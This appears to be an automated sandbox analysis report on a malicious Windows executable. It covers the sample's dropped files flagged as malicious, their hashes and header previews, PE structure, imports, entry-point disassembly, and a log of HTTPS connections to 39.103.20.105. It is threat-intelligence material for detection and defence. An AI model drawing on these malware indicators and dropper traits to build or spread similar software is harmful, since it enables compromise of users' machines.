                                    Preview:GIF89a.......,...........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI
                                    Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):133136
                                    Entropy (8bit):6.350273548571922
                                    Encrypted:false
                                    SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                    MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                    SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                    SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                    SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Joe Sandbox View:
                                    • Filename: 2976587-987347589.07.exe, Detection: malicious, Browse
                                    • Filename: 2873466535874-68348745.02.exe, Detection: malicious, Browse
                                    • Filename: 2362476847-83854387.07.exe, Detection: malicious, Browse
                                    • Filename: 2362476847-83854387.07.exe, Detection: malicious, Browse
                                    • Filename: 2o63254452-763487230.06.exe, Detection: malicious, Browse
                                    • Filename: 2o63254452-763487230.06.exe, Detection: malicious, Browse
                                    • Filename: e2664726330-76546233.05.exe, Detection: malicious, Browse
                                    • Filename: e2664726330-76546233.05.exe, Detection: malicious, Browse
                                    • Filename: 23567791246-764698008.02.exe, Detection: malicious, Browse
                                    • Filename: 287438657364-7643738421.08.exe, Detection: malicious, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):122880
                                    Entropy (8bit):6.002069739492657
                                    Encrypted:false
                                    SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52FH:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gH
                                    MD5:AB0BF9E7EE0FB6F6B6CC2D1DB668D00E
                                    SHA1:36213DAB795D67C87AB994ABCEB57E87E1BEC04C
                                    SHA-256:A7E08665881EC6C0F173BE4EF02F8A1BBED67FDFCBC327CAED89AD137F92450E
                                    SHA-512:BC816C293F1A91651A5BBC85190123FE8D5C1A09E67C34F0416303B0BFADB6D5115B1D4E5C9787785AE2FFFBA4699599A131426C6DC0492517CF61981DA258E5
                                    Malicious:true
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):28272
                                    Entropy (8bit):6.229104167395371
                                    Encrypted:false
                                    SSDEEP:384:P3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/q:POUkgfdZ9pRyv+uPzCMHo3q4tDghg
                                    MD5:5B768C623B9F3624C96B5679181A26E1
                                    SHA1:44BE742E0B6ACB6376798F69A76CA94C1108FB93
                                    SHA-256:8CF3853B0A655D700D99119771F35C958376E3DB63962CA83F3041A3D713F21A
                                    SHA-512:DD2976388D97DAAD7A22764B197C785BD80CD63EB94BC4FAAFB568EBF07EC5DD0630D331F63F75714B8186C0CED1F27107E7CBF5086C186E1070C8DD11333081
                                    Malicious:true
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l...........................................................................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................
                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                    Entropy (8bit):0.08370096109724737
                                    TrID:
                                    • Win64 Executable GUI (202006/5) 92.65%
                                    • Win64 Executable (generic) (12005/4) 5.51%
                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                    • DOS Executable Generic (2002/1) 0.92%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:2976587-987347589.08.exe
                                    File size:30'887'936 bytes
                                    MD5:3f0d4ac83e0bec29aebc666ff027a5d6
                                    SHA1:0e8432e8855e31eca680181b961852deaba74ee8
                                    SHA256:857bcee55a11cc0dd14006a38bd0ca0a8d7f88ea6018219b55ff797cddccea95
                                    SHA512:49ed733c32e8bfef970fd1a33d71905c51be82f6afd6aa6a573464f5d8a8c14d01af79cf9a98a2dbdaa8b977cfcc739fd987814feb251c54dc8a2f96658d317f
                                    SSDEEP:3072:654rQk5rIYRl8YLiVeUeqH+WEwugQyXY2YHFkc1e5evFBDwRucQyTvRBsmuB:I4rUKDLiVeUhEFeYHt1e5evDw/K
                                    TLSH:F767AD1B77E070F9E1B69678C8125649D772B8331731AB9F03A44286DF376D18D3AB22
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X.E.X.E.X.E.:.D.X.E.:.D.X.E.:.D"X.E...D.X.E...D.X.E...D.X.E...E.X.E.X.E.X.E5..D.X.E5..D.X.ERich.X.E........PE..d...%IWe...
                                    Icon Hash:338ed4d4a2726922
                                    Entrypoint:0x140004988
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x140000000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                    DLL Characteristics:HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x65574925 [Fri Nov 17 11:06:13 2023 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:6
                                    OS Version Minor:0
                                    File Version Major:6
                                    File Version Minor:0
                                    Subsystem Version Major:6
                                    Subsystem Version Minor:0
                                    Import Hash:0f7cdde37f1462484539e0138cfa1fe2
                                    Instruction
                                    dec eax
                                    sub esp, 28h
                                    call 00007F1D38B77EC8h
                                    dec eax
                                    add esp, 28h
                                    jmp 00007F1D38B74130h
                                    int3
                                    int3
                                    jmp 00007F1D38B7A370h
                                    int3
                                    int3
                                    int3
                                    inc eax
                                    push ebx
                                    dec eax
                                    sub esp, 20h
                                    dec eax
                                    mov ebx, ecx
                                    jmp 00007F1D38B77A73h
                                    dec eax
                                    mov ecx, ebx
                                    call 00007F1D38B7A376h
                                    test eax, eax
                                    jne 00007F1D38B77A64h
                                    dec eax
                                    cmp ebx, FFFFFFFFh
                                    jne 00007F1D38B77A59h
                                    call 00007F1D38B783D7h
                                    jmp 00007F1D38B77A57h
                                    call 00007F1D38B783B0h
                                    dec eax
                                    mov ecx, ebx
                                    call 00007F1D38B7A3BCh
                                    dec eax
                                    test eax, eax
                                    je 00007F1D38B77A27h
                                    dec eax
                                    add esp, 20h
                                    pop ebx
                                    ret
                                    inc eax
                                    push ebx
                                    dec eax
                                    sub esp, 20h
                                    dec eax
                                    mov ebx, ecx
                                    xor ecx, ecx
                                    call dword ptr [0000A6CFh]
                                    dec eax
                                    mov ecx, ebx
                                    call dword ptr [0000A6BEh]
                                    call dword ptr [0000A6C8h]
                                    dec eax
                                    mov ecx, eax
                                    mov edx, C0000409h
                                    dec eax
                                    add esp, 20h
                                    pop ebx
                                    dec eax
                                    jmp dword ptr [0000A6BCh]
                                    dec eax
                                    mov dword ptr [esp+08h], ecx
                                    dec eax
                                    sub esp, 38h
                                    mov ecx, 00000017h
                                    call 00007F1D38B80FACh
                                    test eax, eax
                                    je 00007F1D38B77A59h
                                    mov ecx, 00000002h
                                    int 29h
                                    dec eax
                                    lea ecx, dword ptr [00014FF7h]
                                    call 00007F1D38B77AFFh
                                    dec eax
                                    mov eax, dword ptr [esp+38h]
                                    dec eax
                                    mov dword ptr [000150DEh], eax
                                    dec eax
                                    lea eax, dword ptr [esp+38h]
                                    Programming Language:
                                    • [C++] VS2015 UPD3.1 build 24215
                                    • [LNK] VS2015 UPD3.1 build 24215
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x177340x64.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d760000x4abc.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d740000xcc0.pdata
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d7b0000x630.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x165d00x54.rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x166300x94.rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0xf0000x2a8.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000xd3500xd400042ff524705fa2abd71cba2c4f95f8feFalse0.5641214622641509data6.363076025733495IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0xf0000x904e0x9200909112f6547c8c223b9d09d4e73580ceFalse0.4260755565068493data4.707335187064855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x190000x1d5ac680x1d58200ab2455c660e8e10120efea481bddb2e9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .pdata0x1d740000xcc00xe00f0027954b09b335b4fb4c14137971ffdFalse0.44363839285714285data4.49612119040806IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .gfids0x1d750000xc40x200bdbf77d4bf01cbf4f15fd100a268f74cFalse0.21875Matlab v4 mat-file (little endian) q, numeric, rows 10, columns 13, imaginary0.9798152519205301IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .rsrc0x1d760000x4abc0x4c00c3521f000215b739b35a6f6b2ba17189False0.9590357730263158data7.924423626369639IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x1d7b0000x6300x8000c3c3adbfa1d7560de091d1d1029dad6False0.537109375data4.797113422033704IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x1d761180x490dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9856692155499706
                                    RT_RCDATA0x1d7aa280x7cdataEnglishUnited States0.6370967741935484
                                    RT_RCDATA0x1d7aaa40x2dataEnglishUnited States5.0
                                    RT_GROUP_ICON0x1d7aaa80x14dataEnglishUnited States1.05
                                    DLLImport
                                    KERNEL32.dllGetFileAttributesW, CloseHandle, GetLastError, WaitForSingleObject, GetExitCodeProcess, CreateProcessW, GetModuleFileNameW, LoadResource, LockResource, SizeofResource, LoadLibraryW, FindResourceW, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetProcessHeap, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, VirtualAlloc
                                    USER32.dllwsprintfW, MessageBoxW
                                    SHELL32.dllShellExecuteExW
                                    SHLWAPI.dllPathCombineW, PathRemoveFileSpecW, PathCanonicalizeW
                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 11, 2025 04:37:46.134413958 CET49718443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:46.134474993 CET4434971839.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:46.134579897 CET49718443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:46.144238949 CET49718443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:46.144269943 CET4434971839.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:47.420399904 CET4434971839.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:47.420670033 CET49718443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:47.421086073 CET4434971839.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:47.421154976 CET49718443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:47.468360901 CET49718443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:47.468429089 CET4434971839.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:47.469418049 CET4434971839.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:47.469515085 CET49718443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:47.470969915 CET49718443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:47.511368990 CET4434971839.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:47.795034885 CET4434971839.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:47.795114994 CET4434971839.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:47.795217037 CET49718443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:47.795273066 CET49718443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:47.801958084 CET49718443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:47.801970959 CET4434971839.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:47.886791945 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:47.886863947 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:47.886934042 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:47.887156963 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:47.887171030 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.110089064 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.110196114 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.110733986 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.110740900 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.110939026 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.110943079 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.445117950 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.445142984 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.445271969 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.445341110 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.445434093 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.445489883 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.445542097 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.445988894 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.446057081 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.678723097 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.678809881 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.678828001 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.678982019 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.679017067 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.679078102 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.679140091 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.679539919 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.679603100 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.680143118 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.680227995 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.680272102 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.680346012 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.681108952 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.681164026 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.913676023 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.913765907 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.913873911 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.913902998 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.913918972 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.913921118 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.913940907 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.913947105 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.913968086 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.913988113 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.914261103 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.914309978 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.914741039 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.914788961 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.915000916 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.915051937 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.915472984 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.915510893 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.915529966 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.915543079 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.915554047 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.915574074 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.915692091 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.915735960 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.916290998 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.916343927 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.916867971 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.916930914 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.916946888 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.916990995 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.917573929 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.917623043 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:49.917717934 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:49.917773008 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:50.134551048 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:50.134690046 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:50.134695053 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:50.134720087 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:50.134752989 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:50.134768963 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:50.134821892 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:50.134869099 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:50.134947062 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:50.134999037 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:50.135060072 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:50.135113955 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:50.135205030 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:50.135297060 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:50.135324955 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:50.135344028 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:50.135349989 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:50.135396957 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:50.135477066 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:50.135530949 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:50.135711908 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:50.135832071 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:50.135840893 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:50.135880947 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:50.135942936 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:50.136023998 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:50.171428919 CET49719443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:50.171463966 CET4434971939.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:50.196676016 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:50.196724892 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:50.196795940 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:50.197020054 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:50.197032928 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:51.465212107 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:51.465276957 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:51.465677023 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:51.465687990 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:51.465847969 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:51.465852022 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:51.793044090 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:51.793070078 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:51.793148041 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:51.793165922 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:51.793179035 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:51.793216944 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:51.793546915 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:51.793593884 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:51.794047117 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:51.794105053 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.031186104 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.031249046 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.031266928 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.031296968 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.031320095 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.031330109 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.031445980 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.031483889 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.031877041 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.031922102 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.032449007 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.032494068 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.032604933 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.032643080 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.033354998 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.033426046 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.277637005 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.277699947 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.277740002 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.277766943 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.277781010 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.277796984 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.277800083 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.277812004 CET4434972039.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:52.277826071 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.277858973 CET49720443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:52.277911901 CET4434972039.103.20.105192.168.2.12
